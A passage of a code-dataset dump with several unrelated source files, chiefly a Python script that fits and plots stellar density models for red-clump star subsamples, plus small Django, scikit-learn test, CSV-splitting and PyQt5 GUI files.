category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"14939232","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\nimport sys\nsys.path.append('..')\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport common as CM\nfrom model import Model\nfrom kline import Kline\n\nconfigPath = sys.argv[1]\niid = sys.argv[2]\nrange = sys.argv[3]\n\nmodelID = iid + '_' + range\nservice = CM.Service(configPath, modelID)\n\nklineJob = Kline(configPath, iid, range)\nklineTask = CM.Task(configPath, modelID, klineJob)\n\nmodelJob = Model(configPath, iid, range)\nmodelTask = CM.Task(configPath, modelID, modelJob)\n\nservice.addTask(klineTask)\nservice.addTask(modelTask)\n\nservice.run()\n\n","sub_path":"src/smooth/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"82231966","text":"###############################################################################\n# fitBroadSubsamples.py: do and report fits for the broad sub-samples\n###############################################################################\nimport sys\nimport os, os.path\nimport pickle\nimport copy\nimport numpy\nimport matplotlib\nmatplotlib.use('Agg')\nfrom galpy.util import bovy_plot, save_pickles\nfrom matplotlib import pyplot\nimport define_rcsample\nimport fitDens\nimport densprofiles\nimport compareDataModel\n_NSAMPLES= 50000\n_LW= 1.5\n# Globals\nlocations= None\ndistmods= None\neffsel= None\neffsel_mar= None\neffsel_drim= None\neffsel_sale= None\neffsel_zero= None\nlcen= None\nbcen= None\nhighbIndx= None\noutDiskIndx= None\nbetwDiskIndx= None \ninDiskIndx= None\nldata= None\ndata_highbIndx= None\ndata_outDiskIndx= None\ndata_betwDiskIndx= None\ndata_inDiskIndx= None\ndata_bulgeIndx= None\ndata_brightIndx= None\ndata_mediumIndx= None\ndata_faintIndx= None\ndef fitBroadSubsamples(sample,savename):\n # Setup the selection function\n setup_selection_function()\n # Load the data\n load_data(sample)\n # Do the fits\n global bf_exp, bf_brexp, bf_twoexp\n global ml_exp, ml_brexp, ml_twoexp\n global samples_exp, samples_brexp, samples_twoexp\n if os.path.exists(savename):\n
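 # reload the cached best fits, maximum likelihoods, and MCMC samples saved by a previous run\n 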
with open(savename,'rb') as savefile:\n bf_exp= pickle.load(savefile)\n bf_brexp= pickle.load(savefile)\n bf_twoexp= pickle.load(savefile)\n ml_exp= pickle.load(savefile)\n ml_brexp= pickle.load(savefile)\n ml_twoexp= pickle.load(savefile)\n samples_exp= pickle.load(savefile)\n samples_brexp= pickle.load(savefile)\n samples_twoexp= pickle.load(savefile)\n else:\n # Perform fits of\n # a) expplusconst\n bf_exp, samples_exp, ml_exp= fit(type='expplusconst')\n # b) brokenexpflare\n bf_brexp, samples_brexp, ml_brexp= fit(type='tribrokenexpflare')\n # c) brokentwoexp\n bf_twoexp, samples_twoexp, ml_twoexp= fit(type='tribrokentwoexp')\n save_pickles(savename,\n bf_exp,bf_brexp,bf_twoexp,\n ml_exp,ml_brexp,ml_twoexp,\n samples_exp,samples_brexp,samples_twoexp)\n # Do the rest of the fits as justfit\n global bf_brexp_g15, ml_brexp_g15, bf_brexp_drim, ml_brexp_drim\n global bf_brexp_sale, ml_brexp_sale, bf_brexp_zero, ml_brexp_zero\n bf_brexp_g15, ml_brexp_g15= fit(type='tribrokenexpflare',dmap='green15',\n justfit=True,init=bf_brexp) \n bf_brexp_drim, ml_brexp_drim= fit(type='tribrokenexpflare',dmap='drimmel03',\n justfit=True,init=bf_brexp)\n bf_brexp_sale, ml_brexp_sale= fit(type='tribrokenexpflare',dmap='sale14',\n justfit=True,init=bf_brexp)\n bf_brexp_zero, ml_brexp_zero= fit(type='tribrokenexpflare',dmap='zero',\n justfit=True,init=bf_brexp)\n return None\n\ndef fit(type='tribrokenexpflare',dmap='marshall06',init=None,justfit=False):\n # Get the correct selection function\n tlocations= copy.deepcopy(locations)\n tdistmods= copy.deepcopy(distmods)\n if dmap == 'green15':\n teffsel= copy.deepcopy(effsel)\n elif dmap.lower() == 'marshall06': \n teffsel= copy.deepcopy(effsel_mar)\n elif dmap.lower() == 'sale14': \n teffsel= copy.deepcopy(effsel_sale)\n elif dmap.lower() == 'drimmel03': \n teffsel= copy.deepcopy(effsel_drim)\n elif dmap.lower() == 'zero': \n teffsel= copy.deepcopy(effsel_zero)\n # Now fit, sample, fit\n fitOut= fitDens.fitDens(ldata,\n numpy.array(tlocations),\n copy.deepcopy(teffsel),\n tdistmods,\n type=type,\n init=init,\n retMaxL=True,\n nsamples=_NSAMPLES,mcmc=not justfit)\n if justfit: return fitOut\n bf, samples, maxl= fitOut\n bf, maxl= fitDens.fitDens(ldata,\n numpy.array(tlocations),\n copy.deepcopy(teffsel),\n tdistmods,\n type=type,\n init=numpy.median(samples,axis=1),\n retMaxL=True)\n return (bf,samples,maxl)\n\ndef setup_selection_function():\n selectFile= '../savs/selfunc-nospdata.sav'\n if os.path.exists(selectFile):\n with open(selectFile,'rb') as savefile:\n apo= pickle.load(savefile)\n # Green et al. \n global locations, distmods, effsel, effsel_mar, effsel_drim, effsel_sale\n global effsel_zero\n with open('../essf/essf_green15.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel= pickle.load(savefile)\n distmods= pickle.load(savefile)\n # Marshall et al. (2006)\n with open('../essf/essf_marshall06.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_mar= pickle.load(savefile)\n # Fill in regions not covered by the Marshall map\n effsel_mar[effsel_mar < -0.5]= effsel[effsel_mar < -0.5]\n # Sale et al. (2014)\n with open('../essf/essf_sale14.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_sale= pickle.load(savefile)\n # Fill in regions not covered by the Sale map\n effsel_sale[effsel_sale < -0.5]= effsel[effsel_sale < -0.5]\n # Drimmel et al (2003)\n with open('../essf/essf_drimmel03.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_drim= pickle.load(savefile)\n # Zero\n with open('../essf/essf_zero.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_zero= pickle.load(savefile)\n # Get (lcen,bcen) for each location\n global lcen, bcen\n lcen= numpy.zeros(len(locations))\n bcen= numpy.zeros(len(locations))\n for ii,loc in enumerate(locations):\n tlcen, tbcen= apo.glonGlat(loc)\n lcen[ii]= tlcen\n bcen[ii]= tbcen\n # Get the locations of various subsamples\n global highbIndx, outDiskIndx, betwDiskIndx, inDiskIndx\n highbIndx= numpy.fabs(bcen) > 10.\n outDiskIndx= (lcen > 140.)*(lcen < 250.)*(~highbIndx)\n betwDiskIndx= (lcen <= 140.)*(lcen >= 70.)*(~highbIndx)\n inDiskIndx= (lcen < 70.)*(~highbIndx)\n return None\n\ndef load_data(sample):\n global ldata\n global data_highbIndx\n global data_outDiskIndx\n global data_betwDiskIndx\n global data_inDiskIndx \n global data_bulgeIndx \n global data_brightIndx\n global data_mediumIndx\n global data_faintIndx\n if sample.lower() == 'all':\n ldata= define_rcsample.get_rcsample()\n elif sample.lower() == 'alllowalpha':\n ldata= define_rcsample.get_rcsample()\n ldata= ldata[ldata[define_rcsample._AFETAG] < 0.1]\n elif sample.lower() == 'lowlow':\n ldata= define_rcsample.get_lowlowsample()\n elif sample.lower() == 'highfeh':\n ldata= define_rcsample.get_highfehsample()\n elif sample.lower() == 'highalpha':\n ldata= define_rcsample.get_highalphasample()\n elif sample.lower() == 'solar':\n ldata= define_rcsample.get_solarsample()\n # Get the indices of the various subsamples defined above\n data_highbIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[highbIndx]:\n data_highbIndx[ii]= True\n data_outDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[outDiskIndx]:\n data_outDiskIndx[ii]= True\n data_betwDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[betwDiskIndx]:\n data_betwDiskIndx[ii]= True\n data_inDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[inDiskIndx]:\n data_inDiskIndx[ii]= True\n return None\n\ndef writeTable(sample,savename,tablename):\n delimiter= ' & '\n types= ['tribrokenexpflare','expplusconst','tribrokentwoexp']\n densmodels= ['broken exp. w/ flare','single exp.',\n 'broken exp. 
w/ 2 $h_Z$']\n extmaps= ['\\citet{Marshall06a}',\n '\\citet{Green15a}',\n '\\citet{Sale14a}',\n '\\citet{Drimmel03a}',\n 'zero']\n with open(tablename,'w') as tablefile:\n # Start w/ fiducial fit\n if sample.lower() == 'lowlow':\n printline= 'low [Fe/H]'\n elif sample.lower() == 'solar':\n printline= 'solar'\n elif sample.lower() == 'highfeh':\n printline= 'high [Fe/H]'\n elif sample.lower() == 'highalpha':\n printline= 'high [$\\\\alpha$/Fe]'\n printline+= delimiter\n # Fiducial\n printline+= densmodels[0]+delimiter\n printline+= extmaps[0]+delimiter\n printline+= _format_results(types[0],extmaps[0])\n tablefile.write(printline+'\\\\\\\\\\n')\n # Green\n printline= delimiter+delimiter+extmaps[1]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[1]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Sale\n printline= delimiter+delimiter+extmaps[2]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[2]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Drimmel\n printline= delimiter+delimiter+extmaps[3]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[3]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Zero\n printline= delimiter+delimiter+extmaps[4]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[4]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Exp.\n printline= delimiter+densmodels[1]+delimiter+extmaps[0]+delimiter\n printline+= _format_results(types[1],extmaps[0]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # twoexp\n printline= delimiter+densmodels[2]+delimiter+extmaps[0]+delimiter\n printline+= _format_results(types[2],extmaps[0]) \n tablefile.write(printline+'\\\\\\\\\\n')\n return None\n\ndef _format_results(type,extmap):\n if type.lower() == 'tribrokenexpflare':\n tsamples= samples_brexp\n out= {'hr1':numpy.median(tsamples[0]),\n 'hr1err':numpy.std(tsamples[0]),\n 'hr2':numpy.median(tsamples[2]),\n 'hr2err':numpy.std(tsamples[2]),\n 'rmax':numpy.median(numpy.exp(tsamples[3])),\n 'rmaxerr':1.4826*numpy.median(numpy.fabs(numpy.exp(tsamples[3])-numpy.median(numpy.exp(tsamples[3])))),\n 'hz':numpy.median(1./tsamples[1]),\n 'hzerr':numpy.std(1./tsamples[1]),\n 'rf':numpy.median(tsamples[4]),\n 'rferr':numpy.std(tsamples[4]),\n 'ml':0.}\n if out['rmax'] < 4.:\n out['rmax']= sorted(numpy.exp(tsamples[3]))[int(round(0.95*tsamples.shape[1]))]\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&$<{rmax:.1f}$&${hz:.2f}\\pm{hzerr:.2f}$&${rf:.2f}\\pm{rferr:.2f}$&\\ldots&{ml:.0f}\".format(**out)\n else:\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&${rmax:.1f}\\pm{rmaxerr:.1f}$&${hz:.2f}\\pm{hzerr:.2f}$&${rf:.2f}\\pm{rferr:.2f}$&\\ldots&{ml:.0f}\".format(**out)\n elif type.lower() == 'expplusconst':\n tsamples= samples_exp\n out= {'hr':numpy.median(tsamples[0]),\n 'hrerr':numpy.std(tsamples[0]),\n 'hz':numpy.median(1./tsamples[1]),\n 'hzerr':numpy.std(1./tsamples[1]),\n 'ml':-2.*(ml_exp-ml_brexp)}\n return \"\\ldots&${hr:.2f}\\pm{hrerr:.2f}$&\\ldots&${hz:.2f}\\pm{hzerr:.2f}$&\\ldots&&{ml:.0f}\".format(**out)\n if type.lower() == 'tribrokentwoexp':\n tsamples= samples_twoexp\n hzindx= numpy.fabs((1./tsamples[1]-1./tsamples[5])*tsamples[1]) > 0.5\n out= {'hr1':numpy.median(tsamples[0]),\n 'hr1err':numpy.std(tsamples[0]),\n 'hr2':numpy.median(tsamples[2]),\n 'hr2err':numpy.std(tsamples[2]),\n 'rmax':numpy.median(numpy.exp(tsamples[3])),\n 'rmaxerr':numpy.std(numpy.exp(tsamples[3])),\n 'hz1':numpy.median(1./tsamples[1]),\n 'hz1err':numpy.std(1./tsamples[1]),\n 
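# 'amp' is quoted as a 95% upper limit over the samples in which the two scale heights are well separated\n 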
'amp':sorted(densprofiles.ilogit(tsamples[4,hzindx]))[int(round(0.95*numpy.sum(hzindx)))],\n 'hz2':numpy.median(1./tsamples[5,hzindx]),\n 'hz2err':numpy.std(1./tsamples[5,hzindx]),\n 'ml':-2.*(ml_twoexp-ml_brexp)}\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&${rmax:.1f}\\pm{rmaxerr:.1f}$&${hz1:.2f}\\pm{hz1err:.2f}$&$<{amp:.2f}$&${hz2:.2f}\\pm{hz2err:.2f}$&{ml:.0f}\".format(**out)\n \ndef _format_results_noerr(type,extmap):\n if type.lower() == 'tribrokenexpflare':\n if 'Mar' in extmap:\n tbf= bf_brexp\n tml= ml_brexp\n elif 'Gre' in extmap:\n tbf= bf_brexp_g15\n tml= ml_brexp_g15\n elif 'Dri' in extmap:\n tbf= bf_brexp_drim\n tml= ml_brexp_drim\n elif 'Sal' in extmap:\n tbf= bf_brexp_sale\n tml= ml_brexp_sale\n elif 'zero' in extmap:\n tbf= bf_brexp_zero\n tml= ml_brexp_zero\n out= {'hr1':numpy.median(tbf[0]),\n 'hr2':numpy.median(tbf[2]),\n 'rmax':numpy.median(numpy.exp(tbf[3])),\n 'hz':numpy.median(1./tbf[1]),\n 'rf':numpy.median(tbf[4]),\n 'ml':-2.*(tml-ml_brexp)}\n return \"{hr1:.2f}&{hr2:.2f}&{rmax:.1f}&{hz:.2f}&{rf:.2f}&\\ldots&{ml:.0f}\".format(**out)\n \ndef plotCompareData(sample,savename,plotname):\n locs= ['highb','outdisk','meddisk','indisk']\n indices= [highbIndx,outDiskIndx,betwDiskIndx,inDiskIndx]\n data_indices= [data_highbIndx,data_outDiskIndx,\n data_betwDiskIndx,data_inDiskIndx]\n # Full prediction for numbers\n Xs,pd= compareDataModel.predict_spacedist(bf_brexp,\n numpy.array(locations),\n copy.deepcopy(effsel_mar),\n distmods,\n type='tribrokenexpflare',coord='dm')\n for loc, index, data_index in zip(locs,indices,data_indices):\n bovy_plot.bovy_print(axes_labelsize=20,text_fontsize=20,\n xtick_labelsize=20,ytick_labelsize=20)\n # High |b|\n # Marshall is fiducial\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n if (sample.lower() == 'solar' and \\\n (loc.lower() == 'outdisk' or loc.lower() == 'highb')) \\\n or (sample.lower() == 'highfeh' and loc.lower() == 'highb'):\n yrange=[0.,\n 1.6*numpy.amax(pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]))]\n else:\n yrange=[0.,\n 1.4*numpy.amax(pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]))]\n bovy_plot.bovy_hist(ldata['RC_DM_H'][data_index],\n histtype='stepfilled',\n normed=True,\n lw=_LW,\n range=[7.,15.5],\n bins=round(numpy.sqrt(numpy.sum(data_index))*2.),\n yrange=yrange,\n ec='k',fc='0.75',\n xlabel=r'$\\mu$')\n line_mar= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2.*_LW,overplot=True,zorder=12)\n bovy_plot.bovy_text(r'$%i\\%% = %i / %i\\ \\mathrm{stars}$' \\\n % (int(round(float(numpy.sum(data_index))/len(ldata)*100.)),\n numpy.sum(data_index),\n len(ldata))\n +'\\n'+r'$%i\\%% = %i / %i\\ \\mathrm{predicted}$' \\\n % (int(round(numpy.sum(pdt)/numpy.sum(pd)*100.)),\n numpy.sum(pdt)/numpy.sum(pd)*len(ldata),len(ldata)),\n top_left=True,size=16.)\n # Green\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_g15,\n numpy.array(locations)[index],\n copy.deepcopy(effsel)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_g15= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='b',\n lw=_LW,overplot=True,zorder=13)\n # Drimmel\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_drim,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_drim)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_drim= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='gold',\n lw=_LW,overplot=True,zorder=12)\n # Sale\n Xs,pdt= 
compareDataModel.predict_spacedist(bf_brexp_sale,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_sale)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_sale= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='c',\n lw=_LW,overplot=True,zorder=12)\n # Zero\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_zero,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_zero)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_zero= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='k',\n ls='-',lw=_LW,overplot=True,zorder=10)\n # Marshall + exp\n Xs,pdt= compareDataModel.predict_spacedist(bf_exp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='expplusconst',\n coord='dm')\n line_exp= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2*_LW,overplot=True,zorder=10,ls=':')\n # Marshall + twoexp\n Xs,pdt= compareDataModel.predict_spacedist(bf_twoexp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='tribrokentwoexp',\n coord='dm')\n line_twoexp= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2*_LW,overplot=True,zorder=11,\n ls='--')\n if sample.lower() == 'lowlow' or sample.lower() == 'highalpha':\n if loc.lower() == 'highb':\n pyplot.annotate(r'$|b| > 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'indisk':\n pyplot.annotate(r'$l < 70^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'meddisk':\n pyplot.annotate(r'$70^\\circ \\leq l \\leq 140^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'outdisk':\n pyplot.annotate(r'$140^\\circ < l < 250^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n # Legend\n if loc.lower() == 'meddisk':\n pyplot.legend((line_mar[0],line_exp[0],line_twoexp[0]),\n (r'$\\mathrm{Marshall\\ et\\ al.\\ (2006)}$'\n +'\\n'+r'$\\mathrm{broken\\ exp.\\ w/\\ flare}$',\n r'$\\mathrm{single\\ exp.}$',\n r'$\\mathrm{broken\\ exp.\\ w/\\ 2}\\ h_Z$'),\n loc='lower right',bbox_to_anchor=(.66,.42),\n numpoints=8,\n prop={'size':14},\n frameon=False)\n elif loc.lower() == 'outdisk':\n pyplot.legend((line_g15[0],line_sale[0],line_drim[0],\n line_zero[0]),\n (r'$\\mathrm{Green\\ et\\ al.\\ (2015)}$',\n r'$\\mathrm{Sale\\ et\\ al.\\ (2014)}$',\n r'$\\mathrm{Drimmel\\ et\\ al.\\ (2003)}$',\n r'$\\mathrm{zero\\ extinction}$'),\n loc='lower right',bbox_to_anchor=(.66,.42),\n numpoints=8,\n prop={'size':14},\n frameon=False)\n if loc.lower() == 'highb':\n if sample.lower() == 'lowlow':\n bovy_plot.bovy_text(r'$\\mathrm{low\\ [Fe/H]}$',\n top_right=True,size=18.)\n elif sample.lower() == 'solar':\n bovy_plot.bovy_text(r'$\\mathrm{solar}$',\n top_right=True,size=18.)\n elif sample.lower() == 'highfeh':\n bovy_plot.bovy_text(r'$\\mathrm{high\\ [Fe/H]}$',\n top_right=True,size=18.)\n elif sample.lower() == 'highalpha':\n bovy_plot.bovy_text(r'$\\mathrm{high}\\ [\\alpha/\\mathrm{Fe]}$',\n top_right=True,size=18.)\n bovy_plot.bovy_end_print(plotname.replace('LOC',loc))\n return None\n\nif __name__ == '__main__':\n # Input:\n # - sample: 'lowlow', 'solar', 'highfeh', 'highalpha'\n # - 
savename: name of the file for the pickle\n # - tablename: name of the file for the table\n # - plotname: name of the file for the plot\n sample= sys.argv[1]\n savename= sys.argv[2]\n tablename= sys.argv[3]\n plotname= sys.argv[4]\n # First, do the fits\n fitBroadSubsamples(sample,savename)\n # Then write the table\n writeTable(sample,savename,tablename)\n # And make the plot comparing data and model\n plotCompareData(sample,savename,plotname)\n","sub_path":"py/fitBroadSubsamples.py","file_name":"fitBroadSubsamples.py","file_ext":"py","file_size_in_byte":24486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"462846621","text":"import csv\nimport re\nimport os\n\n\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\nfor file_name in files:\n\n\tif '.py' in file_name:\n\t\tcontinue\n\n\n\tcontains_path = 'Contains/'\n\n\tinput_file = file_name\n\tprint(input_file)\n\toutput_path = 'parsed/'\n\tinput_string = re.sub('\\.csv$', '', input_file)\n\n\treader = csv.reader(open(input_file, 'r', newline = ''), quotechar = '\"', delimiter = ',', quoting = csv.QUOTE_ALL, skipinitialspace = True)\n\twriter_see_hear = open(contains_path + input_string + \" SEE HEAR\" + \".csv\", \"w+\")\n\twriter_see = open(output_path + input_string + \" SEE\" + \".csv\", \"w+\")\n\twriter_hear = open(output_path + input_string + \" HEAR\" + \".csv\", \"w+\")\n\twriter_neither = open(output_path + input_string + \" NEITHER\" + \".csv\", \"w+\")\n\tcsv_writer_see_hear = csv.writer(writer_see_hear)\n\tcsv_writer_see = csv.writer(writer_see)\n\tcsv_writer_hear = csv.writer(writer_hear)\n\tcsv_writer_neither = csv.writer(writer_neither)\n\n\n\theader = next(reader)\n\n\tcsv_writer_see_hear.writerow(header)\n\tcsv_writer_see.writerow(header)\n\tcsv_writer_hear.writerow(header)\n\tcsv_writer_neither.writerow(header)\n\n\tfor row in reader:\n\t\tif row[35] == '1':\n\t\t\tcsv_writer_see_hear.writerow(row)\n\t\telif row[35] == '0':\n\t\t\tcsv_writer_neither.writerow(row)\n\t\telif row[35] == '-2':\n\t\t\tcsv_writer_hear.writerow(row)\n\t\telif row[35] == '-1':\n\t\t\tcsv_writer_see.writerow(row)\n\n","sub_path":"scripts/temporal-see-hear.py","file_name":"temporal-see-hear.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"203059720","text":"#!/usr/bin/python3\n\nfrom math import gcd\n\nn, m, k = [int(x) for x in input().split(' ')]\n\nans = 0\n\nmu = [0, 1, -1, -1, 0, -1, 1, -1, 0, 0, 1, -1, 0, -1, 1]\n\nfor d in range(1, m + 1):\n for j in range(d, m, d):\n if gcd(k, j) == 1:\n ans += mu[d] * (n // d)\n\nprint(ans)","sub_path":"Online Judges/LOJ/LOJ 2085 「NOI2016」循环之美/2085.py","file_name":"2085.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"547372664","text":"# coding: utf8\nfrom django.urls import path\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom .views import LocationListView, LocationCreateView, LocationUpdateView, LocationDeleteView, StationListView, StationCreateView, StationUpdateView, StationDeleteView\n\nurlpatterns_locations = ([\n\n path('', login_required(LocationListView.as_view()), name='list'),\n path('create', login_required(LocationCreateView.as_view()), name='create'),\n path('update/<int:pk>/', login_required(LocationUpdateView.as_view()), name='update'),\n path('delete/<int:pk>/', login_required(LocationDeleteView.as_view()), name='delete'),\n\n], 'locations')\n\nurlpatterns_stations = ([\n\n path('', login_required(StationListView.as_view()), name='list'),\n path('create', login_required(StationCreateView.as_view()), name='create'),\n path('update/<int:pk>/', login_required(StationUpdateView.as_view()), name='update'),\n path('delete/<int:pk>/', login_required(StationDeleteView.as_view()), name='delete'),\n\n], 'stations')","sub_path":"apps/stations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"1833209","text":"import numpy as np\n\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.datasets import load_iris\n\nfrom pure_sklearn.map import convert_estimator\nfrom pure_sklearn.utils import shape\n\nMAX_ITER = 1000\nTOL = 1e-3\nMETHODS = [\"decision_function\", \"predict\", \"_predict_proba_lr\"]\n\n\ndef test_perceptron():\n X, y = load_iris(return_X_y=True)\n X_ = X.tolist()\n for y_ in [y, (y == 0).astype(int), (y == 2).astype(int)]:\n for fit_intercept in [True, False]:\n clf = Perceptron(fit_intercept=fit_intercept, max_iter=MAX_ITER, tol=TOL)\n clf.fit(X, y_)\n clf_ = convert_estimator(clf)\n\n for method in METHODS:\n scores = getattr(clf, method)(X)\n scores_ = getattr(clf_, method)(X_)\n assert np.allclose(scores.shape, shape(scores_))\n assert np.allclose(scores, scores_)\n","sub_path":"pure_sklearn/linear_model/tests/test_perceptron.py","file_name":"test_perceptron.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"522736841","text":"from PyQt5 import QtWidgets\nfrom PyQt5 import QtCore\n\nimport os\nimport cv2\n\nfrom src.vision.reconstruction.use_cases.reconstruction_from_video import ReconstructionFromVideo\nfrom src.vision.reconstruction.use_cases.reconstruction_from_images import ReconstructionFromImages\nfrom src.vision.calibration.use_cases.CalibrateStereoCamerasFromChessboard import CalibrateStereoCamerasFromChessboard\nfrom src.vision.reconstruction.use_cases.reconstruction_cameras_from_calibration import RecontructCameras\n\nfrom src.vision.presentation.user_interface.partials.calibration_information import CalibrationInformation\nfrom src.vision.presentation.user_interface.partials.reconstruction_information import ReconstructionInformation\n\n\nclass Actions(QtWidgets.QTabWidget):\n take_calibration_images = False\n calibration_images_taken = 0\n frames_between_calibration_images = 0\n\n def __init__(self, parent=None):\n super(QtWidgets.QTabWidget, self).__init__(parent)\n self.parent = parent\n\n self.resize(325, 525)\n self.move(920, 100)\n\n self.addTab(self.create_calibration_widget(), 'Calibration')\n self.addTab(self.create_reconstruction_widget(), 'Reconstruction')\n\n def create_calibration_widget(self):\n self.calibration_actions = QtWidgets.QGroupBox('Actions')\n self.calibration_actions_layout = QtWidgets.QVBoxLayout()\n self.calibration_actions_layout.setAlignment(QtCore.Qt.AlignTop)\n self.calibration_actions_layout.addWidget(self.create_calibration_images_button())\n self.calibration_actions_layout.addWidget(self.create_calibrate_cameras_button())\n self.calibration_actions_layout.addWidget(self.create_build_cameras_button())\n\n self.calibration_actions.setLayout(self.calibration_actions_layout)\n\n self.calibration_information = CalibrationInformation()\n\n self.calibration_widget = QtWidgets.QWidget()\n
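 # stack the actions group above the information panel inside the Calibration tab\n 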
self.calibration_widget_layout = QtWidgets.QVBoxLayout()\n self.calibration_widget_layout.addWidget(self.calibration_actions)\n self.calibration_widget_layout.addWidget(self.calibration_information)\n\n self.calibration_widget.setLayout(self.calibration_widget_layout)\n\n return self.calibration_widget\n\n def create_reconstruction_widget(self):\n reconstruction_actions = QtWidgets.QGroupBox('Actions')\n reconstruction_actions_layout = QtWidgets.QVBoxLayout()\n reconstruction_actions_layout.setAlignment(QtCore.Qt.AlignTop)\n reconstruction_actions_layout.addWidget(self.create_take_photo_button())\n reconstruction_actions_layout.addWidget(self.create_video_record_button())\n reconstruction_actions_layout.addWidget(self.create_reconstruction_button())\n reconstruction_actions_layout.addWidget(self.create_reconstruction_from_video_button())\n\n self.reconstruction_information = ReconstructionInformation()\n\n reconstruction_actions.setLayout(reconstruction_actions_layout)\n reconstruction_actions_widget = QtWidgets.QWidget()\n reconstruction_widget_layout = QtWidgets.QVBoxLayout()\n reconstruction_widget_layout.addWidget(reconstruction_actions)\n reconstruction_widget_layout.addWidget(self.reconstruction_information)\n\n reconstruction_actions_widget.setLayout(reconstruction_widget_layout)\n\n return reconstruction_actions_widget\n\n 